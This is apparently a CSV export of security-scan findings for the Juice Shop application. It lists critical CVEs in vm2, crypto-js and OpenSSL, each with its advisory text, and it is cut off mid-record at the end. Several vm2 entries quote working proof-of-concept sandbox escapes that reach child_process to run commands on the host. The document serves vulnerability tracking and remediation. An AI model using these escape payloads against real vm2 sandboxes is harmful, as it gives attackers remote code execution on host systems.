https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44006 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.601804+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44006,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.598170+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H,10.0,,,0,2026-05-12,,,"vm2: Mutable Proxies for Host Intrinsic Prototypes Allows Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE vm2's bridge exposes mutable proxies for real host-realm intrinsic prototypes and then forwards sandbox writes into the underlying host objects with otherReflectSet() and otherReflectDefineProperty(), which lets attacker-controlled JavaScript running in a default VM or inherited NodeVM mutate shared host Object.prototype, Array.prototype, and Function.prototype from inside the sandbox. NEWLINE NEWLINE ### Details NEWLINE BaseHandler.apply() unwraps sandbox-controlled receivers and arguments with otherFromThis() / otherFromThisArguments() and then directly invokes the real host function with ret = otherReflectApply(object, context, args), so any default-exposed host function that can surface a prototype getter becomes a prototype-walking primitive ([lib/bridge.js:665-676](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L665-L676)). 
BaseHandler.get() special-cases __proto__ and returns the host-side descriptor or proxy target prototype, which is enough for the attacker to reuse the host __lookupGetter__('__proto__') accessor repeatedly until the walk lands on host Object.prototype, Array.prototype, or Function.prototype ([lib/bridge.js:590-616](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L590-L616)). Once the attacker has a proxy to a host intrinsic prototype, BaseHandler.set() performs value = otherFromThis(value); return otherReflectSet(object, key, value) === true;, which writes attacker-controlled data directly into the shared host object instead of keeping the mutation sandbox-local; BaseHandler.defineProperty() repeats the same design at otherReflectDefineProperty(object, prop, otherDesc) for descriptor-based writes ([lib/bridge.js:641-649](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L641-L649), [lib/bridge.js:753-774](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L753-L774)). Existing validation does not stop the attack because the constructor filter only blocks one dangerous-property access pattern, setPrototypeOf() only blocks prototype replacement rather than ordinary property assignment, and containsDangerousConstructor() only protects one later re-unwrapping path instead of the initial host-prototype write sink ([lib/bridge.js:494-530](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L494-L530), [lib/bridge.js:595-610](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L595-L610), [lib/bridge.js:660-662](https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L660-L662)). 
NEWLINE NEWLINE ### PoC NEWLINE Run the following code snippet and observe that the value of vm2EscapeMarker is polluted: NEWLINE ``` NEWLINE const { VM } = require('vm2'); NEWLINE const vm = new VM(); NEWLINE vm.run(` NEWLINE const g = ({}).__lookupGetter__; NEWLINE const a = Buffer.apply; NEWLINE const p = a.apply(g, [Buffer, ['__proto__']]); NEWLINE const hostObjectProto = p.call(p.call(p.call(p.call(Buffer.of())))); NEWLINE hostObjectProto.vm2EscapeMarker = 'polluted-object-prototype'; NEWLINE `); NEWLINE console.log({}.vm2EscapeMarker) NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE Sandbox escape and prototype pollution. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,52ffb47cf0a7369f94bfb744170c2948ded011c5b4ff82bef1978bfed92790ea,229,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.598225+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44005 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.598178+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44005,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],crypto-js,3.3.0,2026-05-12 17:37:05.025779+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N,9.1,,,328,2026-05-12,,,"crypto-js: PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.2.0 NEWLINE NEWLINE crypto-js is a JavaScript library of crypto standards. Prior to version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and at least 1,300,000 times weaker than current industry standard. 
This is because it both defaults to SHA1, a cryptographic hash algorithm considered insecure since at least 2005, and defaults to one single iteration, a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to preimage and collision attacks. If used to protect passwords, the impact is high. If used to generate signatures, the impact is high. Version 4.2.0 contains a patch for this issue. As a workaround, configure crypto-js to use SHA256 with at least 250,000 iterations. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/crypto-js/package.json,,True,,False,False,,False,,a95f6cd299da2691e4707edf2bfc63bbc34f2c4d4646f48da9353a65346f2f87,85,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.025834+00:00,,,,,0,[],4.2.0,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-46233 NEWLINE https://github.com/brix/crypto-js NEWLINE https://github.com/brix/crypto-js/commit/421dd538b2d34e7c24a5b72cc64dc2b9167db40a NEWLINE https://github.com/brix/crypto-js/security/advisories/GHSA-xwcq-pm8m-c4vf NEWLINE https://lists.debian.org/debian-lts-announce/2023/11/msg00025.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-46233 NEWLINE https://ubuntu.com/security/notices/USN-6753-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-46233,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-46233 Crypto-Js 3.3.0,False,False,,2026-05-12 17:37:05.025787+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-46233,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.882877+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,787,2026-05-12,,,"openssl: OpenSSL: Heap buffer overflow on 32-bit systems from large X.509 certificate processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian 
NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: Converting an excessively large OCTET STRING value to NEWLINE a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. NEWLINE NEWLINE Impact summary: A heap buffer overflow may lead to a crash or possibly NEWLINE an attacker controlled code execution or other undefined behavior. NEWLINE NEWLINE If an attacker can supply a crafted X.509 certificate with an excessively NEWLINE large OCTET STRING value in extensions such as the Subject Key Identifier NEWLINE (SKID) or Authority Key Identifier (AKID) which are being converted to hex, NEWLINE the size of the buffer needed for the result is calculated as multiplication NEWLINE of the input length by 3. On 32 bit platforms, this multiplication may overflow NEWLINE resulting in the allocation of a smaller buffer and a heap buffer overflow. NEWLINE NEWLINE Applications and services that print or log contents of untrusted X.509 NEWLINE certificates are vulnerable to this issue. As the certificates would have NEWLINE to have sizes of over 1 Gigabyte, printing or logging such certificates NEWLINE is a fairly unlikely operation and only 32 bit platforms are affected, NEWLINE this issue was assigned Low severity. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the affected code is outside the OpenSSL FIPS module boundary. 
NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,13b52f342da2cf2e5e9fd17bd2cae3b7a273032681fc55fe07ca5d3296e23105,50,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.882933+00:00,,,,,0,[],3.0.19-1~deb12u2,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31789 NEWLINE https://github.com/advisories/GHSA-j79m-9jxq-788r NEWLINE https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde NEWLINE https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf NEWLINE https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49 NEWLINE https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9 NEWLINE https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31789 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31789 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-31789 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.882885+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31789,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.878740+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,787,2026-05-12,,,"openssl: OpenSSL: Remote code execution or Denial of Service via oversized Initialization Vector in CMS parsing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.18-1~deb12u2 NEWLINE NEWLINE Issue summary: Parsing CMS AuthEnvelopedData or EnvelopedData message with NEWLINE maliciously crafted AEAD 
parameters can trigger a stack buffer overflow. NEWLINE NEWLINE Impact summary: A stack buffer overflow may lead to a crash, causing Denial NEWLINE of Service, or potentially remote code execution. NEWLINE NEWLINE When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as NEWLINE AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is NEWLINE copied into a fixed-size stack buffer without verifying that its length fits NEWLINE the destination. An attacker can supply a crafted CMS message with an NEWLINE oversized IV, causing a stack-based out-of-bounds write before any NEWLINE authentication or tag verification occurs. NEWLINE NEWLINE Applications and services that parse untrusted CMS or PKCS#7 content using NEWLINE AEAD ciphers (e.g., S/MIME (Auth)EnvelopedData with AES-GCM) are vulnerable. NEWLINE Because the overflow occurs prior to authentication, no valid key material NEWLINE is required to trigger it. While exploitability to remote code execution NEWLINE depends on platform and toolchain mitigations, the stack-based write NEWLINE primitive represents a severe risk. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the CMS implementation is outside the OpenSSL FIPS module NEWLINE boundary. NEWLINE NEWLINE OpenSSL 3.6, 3.5, 3.4, 3.3 and 3.0 are vulnerable to this issue. NEWLINE NEWLINE OpenSSL 1.1.1 and 1.0.2 are not affected by this issue. 
NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,bf628a11337392cb51a2eaae176d69bd431fee68b6ede424c63cf8e3a4ceb988,49,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.878799+00:00,,,,,0,[],3.0.18-1~deb12u2,,S0,False,,,,,,,,False,http://www.openwall.com/lists/oss-security/2026/01/27/10 NEWLINE http://www.openwall.com/lists/oss-security/2026/02/25/6 NEWLINE https://access.redhat.com/errata/RHSA-2026:1473 NEWLINE https://access.redhat.com/security/cve/CVE-2025-15467 NEWLINE https://bugzilla.redhat.com/2430375 NEWLINE https://bugzilla.redhat.com/2430376 NEWLINE https://bugzilla.redhat.com/2430377 NEWLINE https://bugzilla.redhat.com/2430378 NEWLINE https://bugzilla.redhat.com/2430379 NEWLINE https://bugzilla.redhat.com/2430380 NEWLINE https://bugzilla.redhat.com/2430381 NEWLINE https://bugzilla.redhat.com/2430386 NEWLINE https://bugzilla.redhat.com/2430387 NEWLINE https://bugzilla.redhat.com/2430388 NEWLINE https://bugzilla.redhat.com/2430389 NEWLINE https://bugzilla.redhat.com/2430390 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430375 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430376 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430377 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430378 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430379 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430380 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430381 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430387 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430388 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430389 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430390 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467 NEWLINE 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796 NEWLINE https://errata.almalinux.org/9/ALSA-2026-1473.html NEWLINE https://errata.rockylinux.org/RLSA-2026:1473 NEWLINE https://github.com/advisories/GHSA-wvhq-3h88-rf6g NEWLINE https://github.com/guiimoraes/CVE-2025-15467 NEWLINE https://github.com/openssl/openssl/commit/2c8f0e5fa9b6ee5508a0349e4572ddb74db5a703 NEWLINE https://github.com/openssl/openssl/commit/5f26d4202f5b89664c5c3f3c62086276026ba9a9 NEWLINE https://github.com/openssl/openssl/commit/6ced0fe6b10faa560e410e3ee8d6c82f06c65ea3 NEWLINE https://github.com/openssl/openssl/commit/ce39170276daec87f55c39dad1f629b56344429e NEWLINE https://github.com/openssl/openssl/commit/d0071a0799f20cc8101730145349ed4487c268dc NEWLINE https://linux.oracle.com/cve/CVE-2025-15467.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50081.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-15467 NEWLINE https://openssl-library.org/news/secadv/20260127.txt NEWLINE https://ubuntu.com/security/notices/USN-7980-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-15467,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2025-15467 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.878753+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-15467,debian; os-pkgs,"Active, 
Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.594478+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H,10.0,,,0,2026-05-12,,,"vm2 Access to Host Object Enables Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete. NEWLINE NEWLINE ### Details NEWLINE NEWLINE There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)` NEWLINE NEWLINE ### PoC NEWLINE NEWLINE ```js NEWLINE const g = {}.__lookupGetter__; NEWLINE const a = Buffer.apply; NEWLINE const p = a.apply(g, [Buffer, ['__proto__']]); NEWLINE const o = p.call(p.call(a)); NEWLINE const HObject = o.constructor; NEWLINE sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); NEWLINE NEWLINE const obj = { NEWLINE [sym]: (depth, opt, inspect) => { NEWLINE inspect.constructor(""return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})"")(); NEWLINE }, NEWLINE valueOf: undefined, NEWLINE constructor: undefined, NEWLINE }; NEWLINE NEWLINE WebAssembly.compileStreaming(obj).catch(() => {}); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE NEWLINE Sandbox Escape -> RCE NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,a1b1a8076ae053df37036ac1c55bc64624b729724438ef76291ec568a7a60775,228,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.594531+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6,Admin User 
(admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-43997 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.594486+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-43997,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.590034+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"VM2 Has a Sandbox Escape Issue via SuppressedError NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,fbc5f2b1080189465d1f7e9b9430895aa09874b1963aa57b05fc6bf31206b3d6,227,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.590137+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0 NEWLINE https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f NEWLINE https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca NEWLINE https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d NEWLINE https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26332,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-26332 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.590049+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26332,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.585686+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability through the inspect function. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,61ef3cdda6ac61dd695901bcebc8c74ecff1449cdaff98c4dfae567d0fb28ace,226,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.585740+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24781 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189 NEWLINE https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c NEWLINE https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24781 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24781,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-24781 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.585694+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24781,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 
17:37:05.614320+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,0,2026-05-12,,,"vm2 has Sandbox Breakout Through Null Proto Exception NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.2 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. NEWLINE NEWLINE ### Details NEWLINE NEWLINE In `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object. NEWLINE NEWLINE ### PoC NEWLINE NEWLINE ```js NEWLINE const {VM} = require(""vm2""); NEWLINE const vm = new VM(); NEWLINE console.log(vm.run(` NEWLINE const o = {__proto__: null}; NEWLINE try { NEWLINE throw o; NEWLINE } catch (e) { NEWLINE e.f = Buffer.prototype.inspect NEWLINE o.f.constructor(""return process"")().mainModule.require('child_process').execSync('touch pwned'); NEWLINE } NEWLINE `)); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE NEWLINE Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,e344b6101c174de0ac4c738325937fa30e58b6b6e74297948b9ad0e1a379862e,233,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.614377+00:00,,,,,0,[],3.11.2,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44009 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.614328+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44009,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.582207+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"VM2 Has Sandbox Breakout Through Promise Species NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.10.5 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,c7338ed91feca6e53848ab20d356c24ff45950c30078024d7a888d380a15be8e,225,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.582262+00:00,,,,,0,[],3.10.5,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.10.5 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24120,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-24120 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.582215+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24120,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.578357+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"VM2 Sandbox Breakout Through __lookupGetter__ NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,71fb78161786147968d1282c1e5c0728761b6ce7ed89f8c21738da6fd22304b4,224,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.578414+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3 NEWLINE https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24118,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-24118 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.578366+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24118,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.574079+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"vm2 has a Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.10.2 NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. In lib/setup-sandbox.js, the callback function of 